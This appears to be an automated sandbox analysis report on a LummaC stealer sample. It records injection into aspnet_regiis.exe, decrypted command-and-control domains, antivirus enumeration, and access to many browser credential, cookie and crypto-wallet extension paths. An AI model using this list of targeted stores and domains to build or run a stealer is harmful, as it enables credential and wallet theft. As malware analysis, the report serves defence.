Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PASS-1234.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PASS-1234.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: PASS-1234.exe	String found in binary or memory: cloudewahsj.shop
Source: PASS-1234.exe	String found in binary or memory: noisycuttej.shop
Source: PASS-1234.exe	String found in binary or memory: rabidcowse.shop
Source: PASS-1234.exe	String found in binary or memory: framekgirus.shop
Source: PASS-1234.exe	String found in binary or memory: tirepublicerj.shop
Source: PASS-1234.exe	String found in binary or memory: abruptyopsn.shop
Source: PASS-1234.exe	String found in binary or memory: wholersorie.shop
Source: PASS-1234.exe	String found in binary or memory: undesirabkel.click
Source: PASS-1234.exe	String found in binary or memory: nearycrepso.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3171000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B2000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B5000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31C3000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3171000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B2000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B5000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31C3000	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2E57008	Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D3906E8 cpuid

0_2_6D3906E8

Source: C:\Users\user\Desktop\PASS-1234.exe	Queries volume information: C:\Users\user\Desktop\PASS-1234.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D390163 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6D390163

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
